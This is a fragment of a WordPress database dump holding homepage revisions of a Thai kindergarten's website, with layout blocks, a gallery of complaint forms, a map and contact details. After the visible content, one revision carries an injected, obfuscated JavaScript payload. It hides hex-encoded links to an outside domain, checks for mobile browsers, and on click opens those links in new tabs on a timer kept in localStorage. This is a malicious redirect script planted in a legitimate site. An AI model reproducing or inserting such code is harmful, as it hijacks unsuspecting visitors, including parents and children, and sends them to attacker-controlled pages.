href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 15:07:38','2025-07-15 08:07:38','',19,'http://watprato.ssk.in.th/?p=697',0,'revision','',0),
(699,1,'2025-07-15 15:48:00','2025-07-15 08:48:00','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" 